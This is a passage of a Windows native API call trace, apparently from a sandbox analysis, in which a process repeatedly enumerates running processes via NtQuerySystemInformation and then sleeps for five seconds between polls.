ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.875] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.884] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.906] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.024] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.094] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.110] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.120] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.166] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.173] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.302] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.397] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.459] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.538] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.816] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.825] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 